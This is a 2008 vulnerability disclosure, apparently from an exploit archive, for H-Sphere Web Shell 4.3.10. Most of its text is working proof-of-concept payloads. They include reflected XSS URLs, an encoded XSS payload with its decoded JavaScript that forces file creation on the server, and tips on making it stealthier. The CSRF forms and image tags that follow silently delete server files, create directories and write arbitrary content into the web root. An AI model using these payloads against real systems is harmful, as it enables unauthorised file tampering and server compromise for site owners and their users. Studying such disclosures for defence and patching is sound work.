Web Shell version 4.3.10 suffers from cross site scripting and cross site request forgery vulnerabilities.
6e8d82dccfcb8967815932a7827b2ac2a47e37b85a6e180963497ecd0c82fe86
#=======================================================================#
.____ _________ ._.
| | ______ _ __/ _____/ ____ ____| |
| | / _ \ \/ \/ /\_____ \_/ __ \_/ ___\ |
| |__( <_> ) / / \ ___/\ \___\|
|_______ \____/ \/\_/ /_______ /\___ >\___ >_
\/ \/ \/ \/\/
(http://www.lowsec.org)
#========================================================================#
#========================================================================#
Author: C1c4Tr1Z
Date: 28/09/08
Application: Web Shell version 4.3.10 (2006)
Product WebSite: http://www.psoft.net/HSdocumentation/sysadmin/hsphere-webshell.html
Issues:
[-]Cross-Site Scripting
[-]Cross-Site Request Forgery
Special thanks to OzX (http://www.nullbytes.net/)!
#========================================================================#
#=============================[XSS]======================================#
Proof-of-Concepts:
/actions.php?m=dload&fn=%3Ciframe/src=javascript:alert(%27XSS%27)%3E
/actions.php?m=search&start=1 [POST data: fld=%2F&mask=%3Ciframe%2Fsrc%3Djavascript%3Aalert%280%29%3E]
<!--
This piece of injection would give you the posibility to create a file (filename: "/XSS") with a simple JavaScript code.
Note: you can change the window.open() for an <iframe> to make it more stealth.
Note2: the code is decimal and hexadecimal encoded, to make a successful injection.
Note3: this script uses XMLHttpRequest() so test it on Firefox!
-->
/actions.php?m=sysinfo&tab=1'><img/src/onerror=%26%23119%26%23105%26%23116%26%23104%26%2340%26%23110%26%23101%26%23119%26%2332%26%2388%26%2377%26%2376%26%2372%26%23116%26%23116%26%23112%26%2382%26%23101%26%23113%26%23117%26%23101%26%23115%26%23116%26%2340%26%2341%26%2341%26%23123%26%2310%26%239%26%23111%26%23112%26%23101%26%23110%26%2340%26%2339%26%2371%26%2369%26%2384%26%2339%26%2344%26%2339%26%23104%26%23116%26%23116%26%23112%26%2358%26%2347%26%2347%26%2357%26%2356%26%2346%26%2349%26%2351%26%2349%26%2346%26%2349%26%2354%26%2352%26%2346%26%2353%26%2347%26%23119%26%23101%26%2398%26%23115%26%23104%26%23101%26%23108%26%23108%26%2352%26%2347%26%2397%26%2399%26%23116%26%23105%26%23111%26%23110%26%23115%26%2346%26%23112%26%23104%26%23112%26%2363%26%23109%26%2361%26%23102%26%23117%26%23116%26%23105%26%23108%26%23115%26%2338%26%2397%26%2399%26%2361%26%23109%26%23107%26%23100%26%2339%26%2344%26%23116%26%23114%26%23117%26%23101%26%2341%26%2344%26%2310%26%239%26%23115%26%23101%26%23110%26%23100%26%2340%26%23110%26%23117%26%23108%26%23108%26%2341%26%2344%26%2310%26%239%26%23111%26%23110%26%23114%26%23101%26%2397%26%23100%26%23121%26%23115%26%23116%26%2397%26%23116%26%23101%26%2399%26%23104%26%2397%26%23110%26%23103%26%23101%26%2361%26%23102%26%23117%26%23110%26%2399%26%23116%26%23105%26%23111%26%23110%26%2340%26%2341%26%23123%26%2310%26%239%26%239%26%23105%26%23102%26%2340%26%23114%26%23101%26%2397%26%23100%26%23121%26%2383%26%23116%26%2397%26%23116%26%23101%26%2361%26%2361%26%2352%26%2332%26%2338%26%2338%26%2332%26%23115%26%23116%26%2397%26%23116%26%23117%26%23115%26%2361%26%2361%26%2350%26%2348%26%2348%26%2341%26%23123%26%2310%26%239%26%239%26%239%26%23119%26%23105%26%23116%26%23104%26%2340%26%23119%26%23105%26%23110%26%23100%26%23111%26%23119%26%2346%26%23111%26%23112%26%23101%26%23110%26%2340%26%2339%26%2339%26%2344%26%2339%26%2395%26%2398%26%23108%26%2397%26%23110%26%23107%26%2339%26%2341%26%2341%26%23123%26%2310%26%239%26%239%26%239%26%239%26%23100%26%23111%26%2399%26%23117%26%23109%26%23101%26%23110%26%23116%26%2346%26%23119%26%23114%26%23105%26%23116%26%23101%26%2340%26%23114%26%23101%26%23115%26%23112%26%23111%26%23110%26%23115%26%23101%26%2384%26%23101%26%23120%26%23116%26%2346%26%23114%26%23101%26%23112%26%23108%26%2397%26%2399%26%23101%26%2340%26%2347%26%2360%26%2392%26%2347%26%2398%26%23111%26%23100%26%23121%26%2362%26%2347%26%2344%26%2339%26%2360%26%23115%26%2399%26%23114%26%23105%26%23112%26%23116%26%2362%26%23100%26%23111%26%2399%26%23117%26%23109%26%23101%26%23110%26%23116%26%2346%26%23103%26%23101%26%23116%26%2369%26%23108%26%23101%26%23109%26%23101%26%23110%26%23116%26%23115%26%2366%26%23121%26%2384%26%2397%26%23103%26%2378%26%2397%26%23109%26%23101%26%2340%26%2334%26%23105%26%23110%26%23112%26%23117%26%23116%26%2334%26%2341%26%2391%26%2350%26%2393%26%2346%26%23118%26%2397%26%23108%26%23117%26%23101%26%2361%26%2334%26%2388%26%2383%26%2383%26%2334%26%2359%26%23100%26%23111%26%2399%26%23117%26%23109%26%23101%26%23110%26%23116%26%2346%26%23102%26%23111%26%23114%26%23109%26%23115%26%2391%26%2348%26%2393%26%2346%26%23115%26%23117%26%2398%26%23109%26%23105%26%23116%26%2340%26%2341%26%2359%26%2360%26%2392%26%2347%26%23115%26%2399%26%23114%26%23105%26%23112%26%23116%26%2362%26%2360%26%2347%26%2398%26%23111%26%23100%26%23121%26%2362%26%2339%26%2341%26%2341%26%2359%26%2310%26%239%26%239%26%239%26%239%26%23100%26%23111%26%2399%26%23117%26%23109%26%23101%26%23110%26%23116%26%2346%26%2399%26%23108%26%23111%26%23115%26%23101%26%2340%26%2341%26%2359%26%2310%26%239%26%239%26%239%26%23125%26%2310%26%239%26%239%26%23125%26%2310%26%239%26%23125%26%2359%26%2310%26%23125>
clear js script:
----------------
with(new XMLHttpRequest()){open('GET','http://www.victim.com/actions.php?m=futils&ac=mkd',true),send(null),onreadystatechange=function(){if(readyState==4 && status==200){with(window.open('','_blank')){document.write(responseText.replace(/<\/body>/,'<script>document.getElementsByTagName("input")[2].value="XSS";document.forms[0].submit();<\/script></body>'));document.close();}}};}
#========================================================================#
#============================[CSRF]======================================#
The entire application is vulnerable to CSRF!!
Proof-of-Concepts:
<!--
Delete a file from the server.
-->
<img src="http://www.victim.com/actions.php?m=overkill&kill=1&pos=0&fn=FILENAME">
<!--
Create a directory. (Someone could test if this can lead us to XSS..)
-->
<form name='mkd' method='POST' action='http://www.victim.com/actions.php?m=futils&ac=mkd&create=1' enctype='application/x-www-form-urlencoded'>
<input type='hidden' name='do' value='yes'>
<INPUT type='text' class='text' name='dest' value="PATH">
<INPUT type='text' class='text' name='fld' value="DIR_NAME">
</form>
<script>document.forms[0].submit()</script>
<!--
Create a file with any type of content. (This is more than dangerous, this is madness..)
-->
<FORM name='editor' action='http://www.victim.com/actions.php?m=edit&save=1' method='POST' enctype='application/x-www-form-urlencoded'>
<INPUT type="hidden" name="dest">
<INPUT type='text' name='fln' value='/web_dir/FILENAME'>
<TEXTAREA name='body'>
FILE_CONTENT
</TEXTAREA>
</form>
<script>document.forms[0].submit();</script>
#========================================================================#
#========================================================================#
Contact: C1c4Tr1Z <c1c4tr1z@lowsec.org>
(http://www.lowsec.org)
LowSec! Web Application Security (Lab).
Deus ex Machina
#========================================================================#